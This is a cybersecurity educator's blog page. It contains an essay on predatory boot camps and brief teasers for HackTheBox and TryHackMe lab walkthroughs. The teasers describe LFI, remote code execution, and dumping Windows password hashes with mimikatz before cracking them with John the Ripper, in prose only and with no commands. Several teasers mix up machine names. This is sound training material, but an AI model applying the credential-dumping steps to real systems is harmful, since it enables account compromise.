cybersecurity education

Let’s Talk About Cybersecurity Education

I read this article on tech boot camps, inspiring me to write this post.

Dreams Deferred

I recently presented at the CAE (Center for Academic Excellence) Forum, “Dreams Deferred: The Cost of Cybersecurity Education,” discussing boot camps/training center programs centered around cybersecurity.

The inspiration for my presentation came as I read articles discussing potential solutions to retain and strengthen the cybersecurity pipeline. But I didn’t see articles discussing the downside and downright predatory practices of some boot camps/training centers with underrepresented groups.

In the past three months, I encountered four African Americans lured into these programs. When I asked what made them want to pursue these boot camps/training centers, they described reading articles and watching the news discussing the cybersecurity workforce shortage. Each person believed that completing the boot camp/training center program would improve their lives by getting a job in cybersecurity.

(Almost) Dream Deferred

Their stories sparked memories of almost enrolling in a training center after high school. At that time, IT was a hot topic. I remember commercials describing students as “job ready” after completing the program, and IT experience was not required. I felt ahead of the curve as I had IT experience working at a non-profit during high school.

The plan was to go to class in the morning (8am-12pm) as classes were half-days (another selling point) and then go to work afterward. After describing this to my mentor, she advised me to not go down that path. Her words, “Jasmine go to community college, do not destroy your life. If something is too good to be true, most times it is.”

I’m glad my mentor gave that advice. If she didn’t, I wouldn’t have done the amazing things in my career, such as being an intern for the first African American to receive a Doctorate in Computer Science (Dr. Clarence “Skip” Ellis), graduating with my Master’s in Computer Science and Graduate Certificate in Information Security and Privacy, traveling the world presenting cybersecurity topics, and mentoring the next generation of cybersecurity professionals.

Insidious and Predatory Practices

To better understand the insidious and predatory practices of boot camps/training centers, we need to discuss their patterns:

1. Create targeted ads and marketing to underrepresented groups

2. Lure the potential student to get into tech with little to no experience on an accelerated schedule of six months to one year

3. Make the program seem “exclusive” to rush the student to enroll as soon as possible

4. Have students sign private loans to pay for tuition, which on average is between 3k-15k and interest rates of 10%+

5. The coursework is too difficult for the student to master, and they drop out of the program.

OR

6. The coursework is too easy and doesn’t challenge the student

7. The student graduates from the program, doesn’t find a job and has thousands of dollars in debt.

Falling Prey

One of the four people that contacted me described this exact scenario. This person has a private loan for $12,000 with an interest rate of 13%. Their program is six months. I remember telling this person that my interest rate was never that high with all my years of education (Master’s). They also told me they were falling behind in their coursework as the curriculum had drastically increased. When I inquired more about the coursework, I found the curriculum is not accredited, and most of it is currently available on YouTube. After showing them this information, the person felt dejected. Their words, “I spent $12,000 to improve my life, and I could’ve done this on YouTube for free.”

Quality Cybersecurity Education for All

With the increased push to increase and strengthen the cybersecurity pipeline, mainly from the White House with the National Cybersecurity Workforce and Education Summit, the education potential cybersecurity professionals consume must be quality. This is extremely important for underrepresented populations more susceptible to enrolling in faulty programs described above.

I created my non-profit, T-ATP, to provide an environment for prospective cybersecurity professionals to receive quality cybersecurity training and education. Our mission – creating quality cybersecurity education accessible to all. Students shouldn’t go into debt to improve their lives through quality education.

To learn more or support T-ATP, visit the link here.

capture the flag, hacking, owasp, web application security

#PwnItFridays @hackthebox_eu Staring Point Series: Meow Machine

Another day, another challenge…

In today’s post we’re going to solve the Appointment box from HackTheBox’s Starting Point Series.

The Appointment box explores the following concepts – Linux, Networking, and Account Misconfiguration.

Want to learn more? Watch the below video.

Like the content — support by Buying a Coffee

capture the flag, hacking, owasp, web application security

#PwnItFridays @hackthebox_eu Staring Point Series: Sequel Machine

Another day, another challenge…

In today’s post we’re going to solve the Appointment box from HackTheBox’s Starting Point Series.

The Sequel box explores the following concepts – Linux, SQL, MariaDB, and Weak Passwords.

Want to learn more? Watch the below video.

Like the content — support by Buying a Coffee

capture the flag, hacking, owasp, web application security

#PwnItFridays @hackthebox_eu Staring Point Series: Fawn Machine

Another day, another challenge…

In today’s post we’re going to solve the Fawn box from HackTheBox’s Starting Point Series.

The Appointment box explores the following concepts – Linux, FTP (File Transfer Protocol), and Account Misconfiguration.

Want to learn more? Watch the below video.

Like the content — support by Buying a Coffee

capture the flag, hacking, owasp, web application security

#PwnItFridays @hackthebox_eu Staring Point Series: Dancing Machine

Another day, another challenge…

In today’s post we’re going to solve the Dancing box from HackTheBox’s Starting Point Series.

The Appointment box explores the following concepts – Linux, Structured Query Language (SQL), Structured Query Language Injection (SQLi), and MariaDB which is a community supported fork of the MySQL database.

Want to learn more? Watch the below video.

Like the content — support by Buying a Coffee

capture the flag, hacking, owasp, web application security

#PwnItFridays @hackthebox_eu Staring Point Series: Appointment Machine

Another day, another challenge…

In today’s post we’re going to solve the Appointment box from HackTheBox’s Starting Point Series.

The Appointment box explores the following concepts – Linux, Networking, and Account Misconfiguration.

Want to learn more? Watch the below video.

Like the content — support by Buying a Coffee

capture the flag, hacking

@RealTryHackMe #AdventOfCyber Series: Challenge 6 – Patch Management Is Hard #TisTheSeasonForHacking

Another day, another challenge…

In this post, we’re starting a new series the Advent of Cyber series that is hosted by TryHackMe. This is the third year of the Advent of Cyber where a challenge is released everyday leading to Christmas. In total there will be 25 challenges. In these challenges, we’re McSkidy an elf trying to save Christmas.

In our sixth challenge, we’re presented with a scenario where McSkidy discovered some recovery keys on a web application on a server that needed to be decommissioned. The elf in charge of decommissioning the server never got around to doing the task. McSkidy realizes that the recovery keys found can be used to save other systems.

The topics explored in this challenge are Local File Inclusion (LFI), and Remote Command Execution (RCE). LFI is a vulnerability where files can be accessed from the server. This is bad as ANY file with read permissions can be accessed. LFI happens due to Un-sanitized or lack of input validation. The application accepts any input from the users. Another topic explored is RCE. RCE happens when the user can inject or write to a specific file. When a user finds LFI it’s a good idea to see if RCE is also possible. This will be helpful for our challenge.

Can McSkidy use the recovery keys to log into other systems? Find out below!

If you enjoy my content, buy me a coffee. Link –> http://buymeacoffee.com/thefluffy007

capture the flag, hacking, Uncategorized

@RealTryHackMe #AdventOfCyber Series: Challenge 24 – Learning From The Grinch #TisTheSeasonForHacking

Another day, another challenge…

In this post, we’re starting a new series the Advent of Cyber series that is hosted by TryHackMe. This is the third year of the Advent of Cyber where a challenge is released everyday leading to Christmas. In total there will be 25 challenges. In these challenges, we’re McSkidy an elf trying to save Christmas.

In our twenty-fourth challenge, we’re presented with a scenario where McSkidy wants to perform the same attacks Grinch Enterprises employed on the elves network to learn more about the attack. McSkidy will use the same machine that Grinch Enterprises compromised to understand the Grinch better.

The topic(s) explored in this challenge are post exploitation, hashing, how passwords are stored in the Windows operating system, the mimikatz tool, and how to crack a password hash using the tool John The Ripper. Hashing is a one-way function that is used to change text into an unrecognized form. There are many hashing algorithms such as MD5, SHA1, SHA256, etc.

Post-Exploitation is the process after the attacker has gained access to the system. In this stage, the attacker wants to keep persistence to the machine – meaning they do not want to lose their connection and they also want to escalate their privileges from a standard user to an Administrator/root user.

Hashing is important as it leads into the next topic of how passwords are stored in the Windows operating system. Windows passwords are stored in the Security Accounts Database (SAM). When a user types in a password, that password hash is compared to the hash in the SAM database by way of the Local Security Authority Subsystem Service (LSASS) service. If the passwords match, then the user successful logs in. If the passwords do not match, the user will receive an error message “incorrect password.”

Now that we know how passwords are stored and retrieved in Windows, we can dump them using the mimikatz tool. This tool allows us to dump the hashes from memory that comes from the LSASS service. Finally, once we have a password hash, we can use the tool John The Ripper to crack it. With John The Ripper, we can specify the hashing algorithm we want to use in the process.

Can McSkidy use the Grinch’s nefarious activities to learn more about his attacks? Find out below!

If you enjoy my content, buy me a coffee. Link –> http://buymeacoffee.com/thefluffy007

capture the flag, hacking

@RealTryHackMe #AdventOfCyber Series: Challenge 23 – PowershELlF Magic #TisTheSeasonForHacking

Another day, another challenge…

In this post, we’re starting a new series the Advent of Cyber series that is hosted by TryHackMe. This is the third year of the Advent of Cyber where a challenge is released everyday leading to Christmas. In total there will be 25 challenges. In these challenges, we’re McSkidy an elf trying to save Christmas.

In our twenty-third challenge, we’re presented with a scenario where one of the admins from Elf Dome Enterprises realizes his password file is missing from his desktop. McSkidy suspects that a previous phishing attempt was successful and is on the hunt to figure out what happened.

The topic(s) explored in this challenge are PowerShell and Event Viewer. PowerShell is used to automate day-to-day tasks. PowerShell can also be used for nefarious activity as well. PowerShell is available on Windows, Linux, and macOS. The last concept Event Viewer is a logging system. All actions in Windows are classified as an event and has a specific event ID and record ID. Event Viewer can be helpful as we can filter all events for a particular day, activity/action, and/or provider (such as PowerShell). This will be helpful for the challenge.

Can McSkidy figure out how the admin from Elf Dome Enterprises lost his password file? Find out below!

If you enjoy my content, buy me a coffee. Link –> http://buymeacoffee.com/thefluffy007